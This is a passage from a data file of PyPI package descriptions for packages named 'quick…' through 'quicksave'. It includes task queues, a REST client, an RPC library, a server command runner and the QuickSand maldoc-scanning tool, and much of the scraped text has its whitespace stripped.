helpGames!Quick Start Instructionspipinstallquickpythonthen start withqpythonorquickpythonDisclaimer: This project is provided as-is, for fun, with no guarantee of long-term support or maintenance."} +{"package": "quickpython-mvc", "pacakge-description": "Python rapid development framework"} +{"package": "quickq", "pacakge-description": "# Django Quick QueueDjango Quick Queue is a fast and simple way to use async tasks in Django. This package has a limited use case. If you are looking for a more complex async task systems you should try Django Q, Celery, or Huey. Quick Queue is meant to give you the simplest method to get started executing small asynchronous tasks.# Installation### 1. Install Package`pip install quickq`### 2. Add Base URL to settings.py```pythonQQ_BASE_URL = 'https://mysite.example.com'```### 3. Setup the view in your urls.py```pythonfrom quickq import taskinatorurlpatterns = [url(r'^taskinator/(\\S+)$', taskinator, name=\"taskinator\"),...]```### 4. Add the Task decorator to any function```pythonfrom quickq import Task@Task()def send_approved (name, slug, email):send_mail('Yay E-mail!',message,settings.DEFAULT_FROM_EMAIL,[email],fail_silently=False,)# With a custom Timeout@Task(timeout=120)def another_task ():do_stuff()```### 5. Execute your task as normal```pythonsend_email('Narf', 'narf-me', 'narf@aol.com')```## How it Works1. Your task is called1. A PyJWT is generated.2. The taskinator URL is called asynchronously.2. Taskinator view executed1. Decodes the JWT.2. Excutes the original task function outside of the original request.## Limitations- Function arguments are converted to JSON so they must be JSON compatible.- Request time may be limited. If your webserver has a limitation on request time then that will also affect how long your tasks can execute since they are simply web requests. 
The request is also limited by the `QQ_REQUEST_TIMEOUT` setting.## Additional Settings```QQ_TOKEN_EXPIRATION: Default 60QQ_TOKEN_ALGORITHMS: Default ['HS256']QQ_URL_NAME: Default 'taskinator'QQ_REQUEST_TIMEOUT: Default 60```## ScalingWhile Quick Queue is limited it still could scaled in with a few tricks.- Run a separate web server just for Queue tasks. This would allow you scale your task queue differently and change your request timeout values.- additional?## Future Goals- add task retries- multiple queue URLs"} +{"package": "quick_qemu", "pacakge-description": "installpip3 install quick_qemuexecutepython-mquick_qemu...\nor\nquick_qemu...environmentQUICK_QEMU_OUTPUT: set output, default spice-appQUICK_QEMU_NOGL: if set disables ql renderingQUICK_QEMU_CPU: change virtual cpuQUICK_QEMU_MACHINE: change virtual acpiexamplepython-mquick_qemu~/Downloads/archlinux.iso"} +{"package": "quick-question", "pacakge-description": "No description available on PyPI."} +{"package": "quick-queue", "pacakge-description": "Quick Multiprocessing QueueThis is an implementation of Quick Multiprocessing Queue for Python and work similar tomultiprocessing.queue(more\ninformation aboutmultiprocessing.queueinhttps://docs.python.org/3/library/multiprocessing.html?highlight=process#pipes-and-queues).InstallLast release version of the project to install in:https://pypi.org/project/quick_queue_project/pip install quick-queueIntroductionThe motivation to create this class is due tomultiprocessing.queueis too slow putting and getting elements\nto transfer data between python processes.But if you put or get one list with elements work similar as put or get one single element; this list is getting as\nfast as usually but this has too many elements for process in the subprocess and this action is very quickly.In other words, Multiprocess queue is pretty slow putting and getting individual data, then QuickQueue wrap several\ndata in one list, this list is one single data that is enqueue in the queue than is more quickly than put one\nindividual data.While Producer produce and put lists of elements in queue, subprocesses consume those lists and iterate every element,\nthen subprocesses have elements very quickly.Quick useQuickQueueImport:fromquick_queueimportQQueuePseudocode without process:qq=QQueue()# << Add here `qq` to new process(es) and start process(es) >>qq.put(\"value\")# Put all the values you needqq.end()# When end put values call to end() to mark you will not put more values and close QQueueComplete example (it needsimport multiprocessing):def_process(qq):print(qq.get())print(qq.get())print(qq.get())if__name__==\"__main__\":qq=QQueue()p=multiprocessing.Process(target=_process,args=(qq,))p.start()qq.put(\"A\")qq.put(\"B\")qq.put(\"C\")qq.end()p.join()Note: you need to callendmethod to perform remain operation and close queue. 
If you only want to put the remaining data in the queue, you can call put_remain, but then you need to call close manually (or end, which performs the close operation too). You can put all values in one iterable, or several iterables, with the put_iterable method (put_iterable performs the remain operation when the iterable is consumed, but it does not close the queue; you need to call close() or end() in this case):def_process(qq):print(qq.get())print(qq.get())print(qq.get())if__name__==\"__main__\":qq=QQueue()p=multiprocessing.Process(target=_process,args=(qq,))p.start()qq.put_iterable([\"A\",\"B\",\"C\"])qq.put_iterable([\"D\",\"E\",\"F\"])qq.end()p.join()If you need to use put in another process, then you need to initialize values in QQueue with init. Due to Python's message passing between processes it is not possible to share values in the same shared Queue object (at least I have not found the way) and, on the other hand, you may want to define different initial values per \"put process\" to tune the sensor's work calculation.
You need to call manually toclosebecause afterjoinyou can to do other operations with this queue.You can put all values in one iterable or several iterables withput_iterablemethod (put_iterableperform remain\noperation when iterable is consumed; but this not close queue, you need call toclose()in this case):def_process(qjq):print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()if__name__==\"__main__\":qjq=QJoinableQueue()p=multiprocessing.Process(target=_process,args=(qjq,))p.start()qjq.put_iterable([\"A\",\"B\",\"C\"])qjq.put_iterable([\"D\",\"E\",\"F\"])qjq.join()qjq.close()p.join()If you need to useputin other process, then you need to initialize values in QJoinableQueue withinit.def_process(qjq):# Define initial args to this process, if you do not call to init method, then it use default valuesqjq.init(\"\"\"\"\"\")qjq.put(\"A\")qjq.put(\"B\")qjq.put(\"C\")qjq.join()if__name__==\"__main__\":qjq=QJoinableQueue()p=multiprocessing.Process(target=_process,args=(qjq,))p.start()print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()p.join()You can use defined args in the main constructor if you pass values.def_process(qjq,init_args):qjq.init(**init_args)qjq.put(\"A\")qjq.put(\"B\")qjq.put(\"C\")qjq.join()if__name__==\"__main__\":qjq=QJoinableQueue(\"\"\"\"\"\")p=multiprocessing.Process(target=_process,args=(qjq,qjq.get_init_args()))p.start()print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()p.join()About performanceAn important fact is the size of list (named here \"bucket list\") in relation producer and consumers process to have\nthe best performance:If queue is full, mean consumers are slower than producer.If queue is empty, mean producer is slower than consumers.Then, best size of bucket list (size_bucket_list) is where queue is not full and not empty; for this, I implemented\none sensor to determinate in realtime thesize_bucket_list, you can enable this sensor ifsize_bucket_listisNone(if you define a number insize_bucket_list, then you want a constant value tosize_bucket_listand sensor\ndisable). 
by default sensor is enabled (size_bucket_list=None), because depend on Hardware in your computer thissize_bucket_listvalue should change, I recommend you test the best performance for your computer modifyingsize_bucket_list(withNoneand with number value).You can delimit sensor scope withmin_size_bucket_listandmax_size_bucket_list(ifmax_size_bucket_listis None then is infinite):qq=QQueue(min_size_bucket_list=10,max_size_bucket_list=1000)To disable the sensor define a size insize_bucket_list:qq=QQueue(size_bucket_list=120)Performance testHardware where the tests have been done:Processor: Intel i5 3.2GHzOperating System: Windows 10 x64Queue vs QuickQueueUsepython3 tests\\performance_qqueue_vs_queue.pyPut in a producer process and get in a consumer process N elements withQuickQueueandmultiprocessing.queue:10,000,000 elements (time: Queue = QuickQueue x 13.28 faster):QuickQueue: 0:00:24.436001 | Queue: 0:05:24.4881491,000,000 elements (time: Queue = QuickQueue x 17.55 faster):QuickQueue: 0:00:01.877998 | Queue: 0:00:32.951001100,000 elements (time: Queue = QuickQueue x 6.32 faster):QuickQueue: 0:00:00.591002 | Queue: 0:00:03.736011JoinableQueue vs JoinableQueueUsepython3 tests\\performance_qjoinablequeue_vs_joinablequeue.pyPut in a producer process and get in a consumer process N elements withQuickJoinableQueueandmultiprocessing.JoinableQueue:10,000,000 elements (time: JoinableQueue = QuickJoinableQueue x 6.12 faster):QuickJoinableQueue: 0:01:10.113079 | JoinableQueue: 0:08:09.9745701,000,000 elements (time: JoinableQueue = QuickJoinableQueue x 7.05 faster):QuickJoinableQueue: 0:00:06.858233 | JoinableQueue: 0:00:48.363999100,000 elements (time: JoinableQueue = QuickJoinableQueue x 3.33 faster):QuickJoinableQueue: 0:00:01.192382 | JoinableQueue: 0:00:03.702002DocumentationFunctions:QQueue: Main method to create aQuickQueueobject configured. Args:maxsize: maxsize of bucket lists in queue. Ifmaxsize<=0then queue is infinite (and sensor is disabled, I\nrecommend always define one positive number to save RAM memory). By default:1000size_bucket_list:Noneto enable sensor size bucket list (requiremaxsize>0). If a number is defined\nhere then use this number to size_bucket_list and disable sensor. Ifmaxsize<=0andsize_bucket_list==Nonethen size_bucket_list is default to1000;other wise,\nif maxsize<=0 and size_bucket_list is defined, then use this number. By default:Nonemin_size_bucket_list: (only if sensor is enabled) min size bucket list.Min == 1andmax == max_size_bucket_list - 1. By default:10max_size_bucket_list: (only if sensor is enabled) max size bucket list. IfNoneis infinite.\nBy default:NoneQJoinableQueue: Main method to create aQuickJoinableQueueobject configured. Args:maxsize: maxsize of bucket lists in queue. Ifmaxsize<=0then queue is infinite (and sensor is disabled, I\nrecommend always define one positive number to save RAM memory). By default:1000size_bucket_list:Noneto enable sensor size bucket list (requiremaxsize>0). If a number is defined\nhere then use this number to size_bucket_list and disable sensor. Ifmaxsize<=0andsize_bucket_list==Nonethen size_bucket_list is default to1000;other wise,\nif maxsize<=0 and size_bucket_list is defined, then use this number. By default:Nonemin_size_bucket_list: (only if sensor is enabled) min size bucket list.Min == 1andmax == max_size_bucket_list - 1. By default:10max_size_bucket_list: (only if sensor is enabled) max size bucket list. IfNoneis infinite.\nBy default:NoneClass:QuickQueueThis is a class with heritagemultiprocessing.queues.Queue. 
It overrides the following methods:
put_bucket: puts a whole list of data (a bucket) in the queue.
put: puts a single piece of data, wrapped in a list; data is accumulated until size_bucket_list is reached and the bucket is then put in the queue.
put_remain: enqueues the remaining values that have not been flushed yet.
put_iterable: puts all the data from an iterable into this QQueue.
end: helper that calls put_remain and closes the queue in one method.
get_bucket: gets a whole list of data (a bucket) from the queue.
get: gets a single piece of data, unwrapped from its bucket list.
qsize: returns the number of bucket lists (not the number of elements).
QuickJoinableQueue
This is a class that inherits from QuickQueue and multiprocessing.queues.JoinableQueue. Methods overridden:
put_bucket: puts a whole list of data (a bucket) in the queue.
join: calls put_remain and then calls join (wait until the thread terminates) from multiprocessing.queues.JoinableQueue.
end: raises a warning about incorrect use; put_remain is redefined.
Not overridden, but important for this class:
task_done: indicates that a formerly enqueued task is complete.
Improvements
To implement QuickJoinableQueue I need to call release on the semaphore once for each element of the bucket; this is not the best solution, but it is the easiest way to implement a JoinableQueue safely.
Is it useful for you?
Maybe you would be so kind as to consider the amount of hours put in, the great effort and the resources expended in doing this project. Thank you."}
{"package": "quickr", "pacakge-description": "No description available on PyPI."}
{"package": "quickreduce", "pacakge-description": "No description available on PyPI."}
{"package": "quickregress", "pacakge-description": "quickregress: Polynomial regression for the lazy. quickregress is a minimalist wrapper for sklearn's polynomial and linear regression functionality, intended to reduce the amount of effort needed for simple regression operations. quickregress provides one function: regress(x, y, degree). regress returns a RegressionResult, which has the following methods: predict(x) returns the model's predictions for a list of x values. formula(digits=6, latex=False) returns the model's formula as a string; digits changes the number of significant digits, and latex outputs a LaTeX-friendly string (for use with Jupyter and the like)."}
{"package": "quickremi", "pacakge-description": "This library wraps the popular Python library "REMI" (https://github.com/rawpython/remi) to make UI building easy by simply calling functions with arguments for UI placement. Quick Remi enables building large UIs in the fewest lines of code using pure Python. No HTML or javascript knowledge required.
USAGE:
pip install quickremi
from quickremi.gui import gui as G
Build a Frame or Container:
frame1 = G.create_container(window, H=40, W=45, L=52, T=20, bg='lightblue')
Build Labels:
lbl = G.create_label(frame1, H=50, W=75, L=5, T=2, bg='ivory')
Build Buttons:
btn = G.create_button(frame1, H=10, W=15, L=5, T=20, bg='teal', command=clicked_button)
Use the function help menu to read their respective documentation. In all functions, frame, H, W, L, T are positional (mandatory) arguments that determine their position within a container. Other arguments like background colours, font family, size, font colour, text alignment, justifications, border width, radius, style and border colour etc.
are optional and can be changed as per use.Height, Width, Left and Top are % values by default and hence scale as per the size of the device of display.\nThe arugment 'fs' (font size) also scales as per the display device.Other Widgets in the package:\n- Drop Down\n- List Items\n- Slider\n- Image\n- File Uploader\n- Table\n- Progress Bar\n- Entry Field\n- Date Picker\n- Label Checkbox (Radio Button)\n- SpinboxAll the above widgets follow the same syntax.\n- Frame, Height, Width, Left, Top, and other kwargs whose documentation is available in the help menu.Widgets like Drop Down, Slider, List Items, Entry Field have listeners which read the input values entered by user.Example 1:\nFor: Drop Down or Entry or Slider etc.lst = ['Tiger', 'Lion', 'Jaguar']\ndd = G.create_dropdown(frame1, lst, 20, 50, 5, 5, command=on_selection)Listner functiondef on_selection(widget, value):\n# value will now hold the value of the user selection between tiger lion and jaguar.\nprint(value)Example 2:\nFor List Items, the listener functions in a different way. Following is the example usage.lst = ['Apple', 'Mango', 'Guava']\nlv = G.create_listview(frame1, lst, 20, 50, 5, 5, command=on_value_selection)Listener functiondef on_value_selection(widget, value):\n# value is the index number. Hence lv[val].get_text() is used to fetch the actual text value.val = lv.children[value].get_text()print(val)All the other widget operations revolve around these two examples."} +{"package": "quickrepo", "pacakge-description": "quickrepoIt is quite boring everytime typinggit initin your local computer then go to github and initialize a new repository, take the remote url and add it to the local... I am already tired just by explaining. Thanks Godquickrepoexists.quickrepo is a command-line application that automates initializing a new repository both locally and on GitHub. The user can either initialize the repository in the directory they are currently working in, or generate a brand new folder which will come initialized as a git and github repository.RequirementsPython 3.6+Installationinstall the official package from PyPIpip install quickrepoIf you have multiple versions of Python installed in your system, usepip3 install quickrepoinstead.or install editable source codegit clone github.com/silverhairs/quickrepo.git\ncd quickrepo\npip install --editable .UsageRunquickrepoto list all the available commands.Initialize a new Git & Github repositoryTo generate a brand new project both locally and on Github, open your terminal/command prompt and run:quickrepo newInitialize current working directory as Git & Github repositoryTo initialize a Git repository in the current working directory and push the content on Github, open your terminal/command prompt and runquickrepo here"} +{"package": "quickres", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quick-rest", "pacakge-description": "quick_restA versatile wrapper for REST APIs.DependenciesThe sole non-builtin dependency isrequests.InstallationUse pip to install.python -m pip install quick_restUsageNo full documentation at this time, maybe someday I'll get around to it...You can get and post right now, and use the auth methods listed below. 
You can pass any requests get or post kwarg in on the Client.get and Client.post methods.
Authentication
You can currently use no authentication, key authentication and JWT authentication.
No Authentication
from quick_rest import Client

url = 'https://cat-fact.herokuapp.com/'
client = Client(url)
route = 'facts'
response = client.get(route)
Key
from quick_rest import KeyClient

url = 'https://www.haloapi.com/'
creds = {'keyname': 'somekeyhere'}
client = KeyClient(url, creds)
route = 'stats/hw2/xp?players=LamerLink'  # check out my sweet Halo stats
response = client.get(route)
JWT (JSON Web Token)
from quick_rest import JWTClient

url = 'https://some-jwt-client.com/'
creds = {'username': 'someusername', 'password': 'somepassword'}
# We need to specify the names for the auth_route, token_name, and jwt_key_name.
client = JWTClient(url, creds, 'auth', 'access_token', 'Authorization')
route = 'v0/some/route/results.json'
response = client.get(route)
Results
Results come in the form of a ServerResponse object. You can access the raw_content attribute or use the decode, get_value, to_txt and to_csv methods to get the data from the object.
raw_response = response.raw_response
decoded_response = response.decode()  # utf-8 by default
decoded_response = response.decode(encoding='utf-16')
value = response.get_value(key_name)
response.to_txt('some/path/file.txt')  # dumps the raw response to file
response.to_csv('some/path/file.csv')
# By default, to_csv sets \n as the lineterminator and writes the header to file
response.to_csv('some/path/file.csv', lineterminator='\t', omit_header=True)
Issues/Suggestions
Please make any suggestions or issues on the Github page.
To Do
Tests.
Oauth client.
License
This project is licensed under the MIT License. Please see the LICENSE.md file for details."}
{"package": "quick-resto-API", "pacakge-description": "Quick Resto API. An implementation of the Quick Resto API in the Python programming language. Quick Resto API on PyPI."}
{"package": "quickrpc", "pacakge-description": "QuickRPC is a library that is designed for quick and painless setup of communication channels and Remote-call protocols. Python 3 only. A remote interface is defined like so:
from quickrpc import RemoteAPI, incoming, outgoing

class EchoAPI(RemoteAPI):
    '''Demo of how to use RemoteAPI.
    EchoAPI answers incoming `say` calls with an `echo` call.
    '''
    @incoming
    def say(self, sender="", text=""): pass

    @outgoing
    def echo(self, receivers=None, text=""): pass
The interface is used over a Transport, which might e.g. be a TCP connection or Stdio:
api = EchoAPI(codec='jsonrpc', transport='tcpserv::8888')
# on incoming "say", call "echo"
api.say.connect(lambda sender="", text="": api.echo(text=text))

# transport starts in a new thread.
api.transport.start()
input('Serving on :8888 - press ENTER to stop')
api.transport.stop()
That's it! You could now connect to the server e.g. via telnet:
$ telnet localhost 8888
say text:"hello"
(Exit via Ctrl+5 -> "quit")
INSTALLATION
Requirements: Basically none, except for Python >= 3. For the Qt Transports, PyQt4 is required. Then:
pip install https://github.com/loehnertj/quickrpc/archive/master.zip
Or, download / clone and use python setup.py install.
LICENSE
MIT License: https://github.com/loehnertj/quickrpc/blob/master/LICENSE
DOCUMENTATION
Please proceed to http://quickrpc.readthedocs.io/en/latest/index.html
TODO
This is a hobby project. If you need something quick, contact me or better, send a pull request.
:-)Things I might add in the future: In-process \u201cloopback\u201d transport; Serial interface transport;msgpackCodec.SSH support would be really cool but don\u2019t hold your breath for that."} +{"package": "quickrspecpuppet", "pacakge-description": "# quickrspecpuppetPython CLI that allows you to quickly create basic rspec tests for your puppet modules## Get StartedInstall `quickrspecpuppet` using one of the following:$ pip install quickrspecpuppet$ python setup.py installRun `quickrspecpuppet` in the root directory of your puppet module:$ quickrspecpuppet## UsageQuickly create basic rspec tests for your puppet modules```Usage:quickrspecpuppet [ --directory=DIRECTORY ] [ --force ] [ --verbose ]quickrspecpuppet (-h | --help)Options:-d, --directory=DIRECTORY Base directory of puppet module [default: os.cwd]-f, --force Overwrite tests if they exist-v, --verbose Enable verbose logging-h, --help Show this screen.```## PackagingBuilding an RPM:```make rpms```"} +{"package": "quickrun", "pacakge-description": "quickrunquickrun is a module designed to make it easy to run commands and gather info from multiple servers.Dependenciespython3.8aws cli (v1)Getting startedSetupInstall:pip3 install quickrunUse:importquickrunfromquickrun.cli.awsimportfind_instances# Define instanceqr=quickrun.QuickRun()# Configureqr.servers=[quickrun.Server(host=\"my-ip-address-or-hostname\",name=\"my-web-server\",user=\"username\")]# or from aws cliqr.servers=quickrun.Servers.from_list(find_instances({'tag:environment':'production','tag:name':'*web*'},region='eu-west-1'))qr.commands=[quickrun.Command(name=\"Get openssl version\",cmd=\"openssl version\")]qr.formatter=quickrun.formatters.table# Callqr.main()qr.display()This will display something like:Results\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 server \u2503 host \u2503 command \u2503 output \u2503\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\n\u2502 my-instance-name-1 \u2502 192.168.0.1 \u2502 openssl version \u2502 OpenSSL 1.1.1 11 Sep 2018 \u2502\n\u2502 my-instance-name-2 \u2502 192.168.0.1 \u2502 openssl version \u2502 OpenSSL 1.1.1 11 Sep 2018 \u2502\n\u2502 my-instance-name-3 \u2502 192.168.0.1 \u2502 openssl version \u2502 OpenSSL 1.1.1 11 Sep 2018 \u2502\n\u2502 my-instance-name-4 \u2502 192.168.0.1 \u2502 openssl version \u2502 OpenSSL 1.1.1 11 Sep 2018 
\u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518Making a scriptOption 1: Basic script using some of the functionsYou can just write a normal python script and use some of the functions from this module.Seeexamples/healthcheck.pyas an example.Option 2: Calling out to QuickRunThere is also the baseQuickRunclass which can be configured and called.Seeexamples/openssl-version.pyandexamples/list-logs.pyas examples.Option 3: Extending QuickRunYou could also create your own class extending fromQuickRun.This is handy since you can override thehook methods.Seeexamples/get-memory-settings.pyas an example.HelpersThere are a few core helpers built in to quickrun.FormattersThere are a few formatters defined inquickrun.formattersdefault: Just prints out the python objectnone: Does nothingfake_shell: Formats the run as if it was ran directlytable: Outputs the run as a tablecli.awsThere is also a helpfulquickrun.cli.aws.find_instances()function that takes a dict of filters and returns matching instances.Example:find_instances({'tag:name':'web','tag:environment':'prod'},region='eu-west-1')cli.helpersThere is a collection of misc CLI helpers inquickrun.cli.helpers.Currently there is onlychallenge(expect: str) -> boolwhich prompts the user to re-enter a value.HooksTODO"} +{"package": "quicks", "pacakge-description": "Project generatorpip install quicks\n\nquicks PROJECT_NAME example.ymlexample.yml Jinja2 stylefiles:-'{{project}}/__init__.py'-'{{project}}/__main__.py'-'{{project}}/requirements.txt'-'.gitignore'-'LICENSE'-'Dockerfile'-'README.md'templates:'README.md':|# {{project}}"} +{"package": "quicksample", "pacakge-description": "QuickSampleA sample python package deployment utility for SQLShack Demo."} +{"package": "quicksample000012", "pacakge-description": "No description available on PyPI."} +{"package": "quicksample101", "pacakge-description": "Py-Module"} +{"package": "quicksample2", "pacakge-description": "No description available on PyPI."} +{"package": "quicksample611", "pacakge-description": "Hello les amis depuis quicksample"} +{"package": "quicksamplemedinillag", "pacakge-description": "QuickSampleA sample python package deployment utility for Data Demo."} +{"package": "quicksamplemule", "pacakge-description": "A sample python package deployment utility for Demo."} +{"package": "quicksampleTest", "pacakge-description": "Getting Started with APIMATIC CalculatorIntroductionSimple calculator API hosted on APIMATICBuildingYou must have Python3 >=3.7, <= 3.9installed on your system to install and run this SDK. This SDK package depends on other Python packages like nose, jsonpickle etc. These dependencies are defined in therequirements.txtfile that comes with the SDK. To resolve these dependencies, you can use the PIP Dependency manager. Install it by following steps athttps://pip.pypa.io/en/stable/installing/.Python and PIP executables should be defined in your PATH. Open command prompt and typepip --version. 
This should display the version of the PIP Dependency Manager installed if your installation was successful and the paths are properly defined.Using command line, navigate to the directory containing the generated files (includingrequirements.txt) for the SDK.Run the commandpip install -r requirements.txt. This should install all the required dependencies.InstallationThe following section explains how to use the apimaticcalculator library in a new project.1. Open Project in an IDEOpen up a Python IDE like PyCharm. The basic workflow presented here is also applicable if you prefer using a different editor or IDE.Click onOpenin PyCharm to browse to your generated SDK directory and then clickOK.The project files will be displayed in the side bar as follows:2. Add a new Test ProjectCreate a new directory by right clicking on the solution name as shown below:Name the directory as \"test\".Add a python file to this project.Name it \"testSDK\".In your python file you will be required to import the generated python library using the following code linesfromapimaticcalculator.apimaticcalculator_clientimportApimaticcalculatorClientAfter this you can write code to instantiate an API client object, get a controller object and make API calls. Sample code is given in the subsequent sections.3. Run the Test ProjectTo run the file within your test project, right click on your Python file inside your Test project and click onRunTest the SDKYou can test the generated SDK and the server with test cases.unittestis used as the testing framework andnoseis used as the test runner. You can run the tests as follows:Navigate to the root directory of the SDK and run the following commandspip install -r test-requirements.txt\nnosetestsInitialize the API ClientNote:Documentation for the client can be foundhere.The following parameters are configurable for the API Client:ParameterTypeDescriptionenvironmentEnvironmentThe API environment.Default:Environment.PRODUCTIONhttp_client_instanceHttpClientThe Http Client passed from the sdk user for making requestsoverride_http_client_configurationboolThe value which determines to override properties of the passed Http Client from the sdk userhttp_call_backHttpCallBackThe callback value that is invoked before and after an HTTP call is made to an endpointtimeoutfloatThe value to use for connection timeout.Default: 60max_retriesintThe number of times to retry an endpoint call if it fails.Default: 0backoff_factorfloatA backoff factor to apply between attempts after the second try.Default: 2retry_statusesArray of intThe http statuses on which retry is to be done.Default: [408, 413, 429, 500, 502, 503, 504, 521, 522, 524]retry_methodsArray of stringThe http methods on which retry is to be done.Default: ['GET', 'PUT']The API client can be initialized as follows:fromapimaticcalculator.apimaticcalculator_clientimportApimaticcalculatorClientfromapimaticcalculator.configurationimportEnvironmentclient=ApimaticcalculatorClient(environment=Environment.PRODUCTION,)List of APIsSimple CalculatorClasses DocumentationUtility ClassesHttpResponseHttpRequest"} +{"package": "quicksample-vdo-123123", "pacakge-description": "A sample python package deployment utility for SQLShack Demo."} +{"package": "quicksampleYentim0519", "pacakge-description": "A sample python package deployment utility for SQLShack Demo."} +{"package": "quicksand", "pacakge-description": "QuickSand Version 2QuickSand Python Package and Command Line ToolQuickSand is a Python-based analysis framework to analyze suspected malware 
documents to identify exploits in streams of different encodings or compressions. QuickSand supports documents, PDFs, Mime/Email, Postscript and other common formats. A built-in command line tool can process a single document or directory of documents.QuickSand scans within the decoded streams of documents and PDFs using Yara signatures to identify exploits or high risk active content.A hosted version is available to try without any installation atscan.tylabs.com.Files:src/quicksand/quicksand.py: Main quicksand class and CLI toolsrc/quicksand/quicksand_exe.yara: Yara rules to detect executables.src/quicksand/quicksand_exploits.yara: Yara rules to detect exploits in documents.src/quicksand/quicksand_pdf.yara: Yara rules to detect exploits in PDFs.bin/quicksand: Command line tool.requirements.txt: Python dependencieslambda/Optional AWS Lambda functionsWith Thanks to the Creators of:pdfreaderoletoolscryptographyzipfile38olefileyara-pythonyaraInstallation from Pypi using pippip3 install quicksandUpgrade from Pypi using pippip3 install --upgrade quicksandInstall from sourceIf you want to install from the source, such as the uicksand-main.zip downloaded from GitHub:pip3 install quicksand-main.zipCommand Line UsageA command line tool for quicksand to process and output json or txt results.usage: quicksand [-h] [-v] [-c] [-y] [-t TIMEOUT] [-e EXPLOIT] [-x EXE] [-a PDF] [-f {json,txt}] [-o OUT] [-p PASSWORD]\n [-d DROPDIR]\n document\n\nQuickSand Document and PDF maldoc analysis tool.\n\npositional arguments:\n document document or directory to scan\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --verbose increase output verbosity\n -c, --capture capture stream content\n -y, --yara capture yara matched strings\n -t TIMEOUT, --timeout TIMEOUT\n timeout in seconds\n -e EXPLOIT, --exploit EXPLOIT\n yara exploit signatures\n -x EXE, --exe EXE yara executable signatures\n -a PDF, --pdf PDF yara PDF signatures\n -f {json,txt}, --format {json,txt}\n output format\n -o OUT, --out OUT save output to this filename\n -p PASSWORD, --password PASSWORD\n password to decrypt ole or pdf\n -d DROPDIR, --dropdir DROPDIR\n save objects to this directoryProcess a single filequicksand document.docProcess a directory of filesquicksand malware/Python Module UsageFile from memoryfrom quicksand.quicksand import quicksand\nimport pprint\n\nqs = quicksand(data, timeout=18, strings=True)\nqs.process()\npprint.pprint(qs.results)Processing using a filenamefrom quicksand.quicksand import quicksand\n\nqs2 = quicksand(\"file.doc\")\nqs2.process()\nqs.resultsProcess a Directoryfrom quicksand.quicksand import quicksand\nqs = quicksand.readDir(\"malware\")\nqsReturns a dictionary of {filename:qs_results,...}.Optional initializer valuescapture: True|False return content of extracted streamsdebug: True|False print debugging messages to stdoutexploityara: Path to exploit yara rulesexecyara: Path to executable yara rulespdfyara: PDF Exploits yara rulespassword: Password for encrypted documents/PDFstimeout: Timeout processing: 0 for unlimited.ScoringDocuments are scored based on the rank value in the associated Yara signature metadata.Additionally, each signature defines whether the detected item is an exploit, a warning or a risky feature. 
For more information on how to interpret the results, please seehttps://scan.tylabs.com/howto.If you add your own signatures, they don't need to include the extra metadata to function.zlib issues on MacOSMacOS users may get zlib issues (PDF FlateDecode etc) due to missing OpenSSL headers since MacOs 10.4.zlib.error: Error -3 while decompressing data: unknown compression method\nzlib.error: Error -3 while decompressing data: incorrect header checkOne solution is to install zlib with Brew.sh and reinstall Python 3 using pyenv:export LDFLAGS=\"-L/usr/local/opt/zlib/lib\"\nexport CPPFLAGS=\"-I/usr/local/opt/zlib/include\"\npyenv install 3.8.5Using Quicksand?Let us know@tylabsIssues and Project HomeQuickSand GitHub"} +{"package": "quicksave", "pacakge-description": "A (very) simple file versioning systemVersion:1.7.0Detailed documentation on the available commands can be found on thequicksave wikiGetting started:The first thing you\u2019ll need to do is create a new database where\nquicksave can store its data:$ quicksave init That will setup the new database so it\u2019s ready to use.After that, you\u2019re good to go. You canregisternew files so they\u2019re\ntracked by quicksave,savenew states of registered files, andrevertto previously saved states. There are several other commands\nwhich modify the database itself, but I\u2019m only covering those three\nlisted commands in this guide (and none of their various options). For\ndetailed documentation on all of the available commands, check out thewiki page.To track (AKA register) a new file in quicksave use:$ quicksave register Which will copy the initial state of the file, and provide the names of\nthe file and state keys you\u2019ll need use this file. For a brief\ndescription of file and state keys, seethis\nnoteon the wiki.To then save a new state of the file, use the save command:$ quicksave save Quicksave will use the the absolute path and the base file name derived\nfromfilepathto automatically decide which file key to use.Lastly, to get the file back into a previously saved state, use the\nrevert command:$ quicksave revert Again, quicksave will attempt to determine which file key to use based\non the absolute path and the file name. 
